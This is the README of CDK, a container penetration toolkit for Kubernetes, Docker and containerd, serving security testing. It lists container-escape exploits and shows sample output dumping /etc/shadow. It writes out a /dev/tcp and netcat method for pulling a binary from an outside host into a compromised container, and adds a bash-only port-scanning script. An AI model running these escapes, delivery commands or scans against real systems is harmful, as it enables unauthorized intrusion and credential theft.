CDK

📦 Make security testing of K8s, Docker, and Containerd easier.

README

CDK - Zero Dependency Container Penetration Toolkit

English | 简体中文

Legal Disclaimer

Usage of CDK for attacking targets without prior mutual consent is illegal. CDK is for security testing purposes only.

Overview

CDK is an open-source container penetration toolkit, designed to provide stable exploitation in slimmed-down containers without any OS dependency. It ships with useful net-tools and many powerful PoCs/EXPs, and helps you escape the container and take over the K8s cluster.

Quick Start

Run cdk eva (short for cdk evaluate) to gather information and get a recommended exploit, then run cdk run <exploit> to start the attack.

> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Installation/Delivery

Download the latest release from https://github.com/cdk-team/CDK/releases/

Drop executable files into the target container and start testing.

TIPS: Deliver CDK into the target container in real-world penetration testing

If you have an exploit that can upload a file, you can upload the CDK binary directly.

If you have an RCE exploit but the target container has no curl or wget, you can use the following method to deliver CDK:

  1. First, host the CDK binary on a machine with a public IP (on that host):
nc -lvp 999 < cdk
  2. Inside the victim container, execute (use the same port as the listener):
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

Two caveats: the /dev/tcp redirection is a bash feature, so it fails in a container whose only shell is sh, dash or busybox ash; and a raw TCP copy that drops mid-transfer leaves a truncated file without any error. If the container has sha256sum or md5sum, compare the digest of the received cdk with the one on your host before running it.

Usage

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of etcd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help         Show this help msg.
  -v --version      Show version.
  --profile=<name>  Select evaluation profile.
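Target expansion for the probe tool, as an added example that is not part of CDK. It accepts the same argument shape as cdk probe 10.0.1.0-255 80,8080-9443 50 1000 (a last-octet IP range, a comma list of ports or port ranges, a parallelism cap and a timeout in milliseconds) and runs the scan with bash alone when no binary can be dropped into the container. Assumptions: bash, for the same /dev/tcp redirection the delivery tip above relies on, and coreutils timeout for the connect deadline; the function names expand_ports, expand_ips, count_targets, probe_one and probe are chosen here.

```shell
#!/usr/bin/env bash
# Bash-only TCP probe with the argument shape of `cdk probe <ip> <port> <parallel> <timeout-ms>`.
# Added example, not CDK's code. Assumes bash (for /dev/tcp) and coreutils `timeout`.

# expand_ports "80,8080-9443": one port per line, expanding hyphen ranges.
expand_ports() {
    echo "$1" | tr ',' '\n' | while IFS= read -r item; do
        case "$item" in
            '')  ;;
            *-*) lo=${item%-*}; hi=${item#*-}
                 p=$lo
                 while [ "$p" -le "$hi" ]; do echo "$p"; p=$((p + 1)); done ;;
            *)   echo "$item" ;;
        esac
    done
}

# expand_ips "10.0.1.0-255": the README's form, a range in the last octet only.
expand_ips() {
    prefix=${1%.*}            # 10.0.1
    last=${1##*.}             # 0-255 or a single octet
    case "$last" in
        *-*) lo=${last%-*}; hi=${last#*-} ;;
        *)   lo=$last; hi=$last ;;
    esac
    o=$lo
    while [ "$o" -le "$hi" ]; do echo "$prefix.$o"; o=$((o + 1)); done
}

# count_targets <ipspec> <portspec>: number of TCP connects the scan would attempt.
count_targets() {
    ips=$(expand_ips "$1" | wc -l | tr -d ' ')
    ports=$(expand_ports "$2" | wc -l | tr -d ' ')
    echo $((ips * ports))
}

# probe_one <ip> <port> <timeout-ms>: print "<ip>:<port> open" if a connect succeeds.
# /dev/tcp has no sub-second timeout, so the deadline is rounded up to whole seconds.
probe_one() {
    secs=$(( ($3 + 999) / 1000 ))
    if timeout "$secs" bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null; then
        echo "$1:$2 open"
    fi
}

# probe <ipspec> <portspec> <parallel> <timeout-ms>: run probe_one in batches of <parallel>.
probe() {
    running=0
    for ip in $(expand_ips "$1"); do
        for port in $(expand_ports "$2"); do
            probe_one "$ip" "$port" "$4" &
            running=$((running + 1))
            if [ "$running" -ge "$3" ]; then wait; running=0; fi
        done
    done
    wait
}

# Example invocation (same arguments as the README's cdk probe example):
#   probe 10.0.1.0-255 80,8080-9443 50 1000
```

Run count_targets before probing: the README's example spec expands to 256 hosts times 1365 ports, 349440 connects, and with the deadline rounded up to 1 s and 50 in flight that is a slow scan in a bash loop; narrow the port list (for example 22,80,443,2375,6443,10250) when you only need to find the K8s and Docker endpoints.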

Features

CDK has three modules:

  1. Evaluate: gather information inside container to find potential weakness.
  2. Exploit: container escape, persistence and lateral movement.
  3. Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.

Evaluate Module

Usage

cdk evaluate [--full]

|Tactics|Script|Supported|Usage/Example|
|---|---|---|---|
|Information Gathering|OS Basic Info|✔|link|
|Information Gathering|Available Capabilities|✔|link|
|Information Gathering|Available Linux Commands|✔|link|
|Information Gathering|Mounts|✔|link|
|Information Gathering|Net Namespace|✔|link|
|Information Gathering|Sensitive ENV|✔|link|
|Information Gathering|Sensitive Process|✔|link|
|Information Gathering|Sensitive Local Files|✔|link|
|Information Gathering|Kube-proxy Route Localnet (CVE-2020-8558)|✔|link|
|Information Gathering|DNS-Based Service Discovery|✔|link|
|Discovery|K8s Api-server Info|✔|link|
|Discovery|K8s Service-account Info|✔|link|
|Discovery|Cloud Provider Metadata API|✔|link|

Exploit Module

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run <script-name> [options]

| Tactic | Technique | CDK Exploit Name | Supported | In Thin | Doc |
|---|---|---|---|---|---|
| Escaping | docker-runc CVE-2019-5736 | runc-pwn | ✔ | ✔ | |
| Escaping | containerd-shim CVE-2020-15257 | shim-pwn | ✔ | | link |
| Escaping | docker.sock PoC (DIND attack) | docker-sock-check | ✔ | ✔ | link |
| Escaping | docker.sock RCE | docker-sock-pwn | ✔ | ✔ | link |
| Escaping | Docker API (2375) RCE | docker-api-pwn | ✔ | ✔ | link |
| Escaping | Device Mount Escaping | mount-disk | ✔ | ✔ | link |
| Escaping | LXCFS Escaping | lxcfs-rw | ✔ | ✔ | link |
| Escaping | Cgroups Escaping | mount-cgroup | ✔ | ✔ | link |
| Escaping | Abuse Unprivileged User Namespace Escaping CVE-2022-0492 | abuse-unpriv-userns | ✔ | ✔ | link |
| Escaping | Procfs Escaping | mount-procfs | ✔ | ✔ | link |
| Escaping | Ptrace Escaping PoC | check-ptrace | ✔ | ✔ | link |
| Escaping | Rewrite Cgroup (devices.allow) | rewrite-cgroup-devices | ✔ | ✔ | link |
| Escaping | Read arbitrary file from host system (CAP_DAC_READ_SEARCH) | cap-dac-read-search | ✔ | ✔ | link |
| Discovery | K8s Component Probe | service-probe | ✔ | ✔ | link |
| Discovery | Dump Istio Sidecar Meta | | | | |
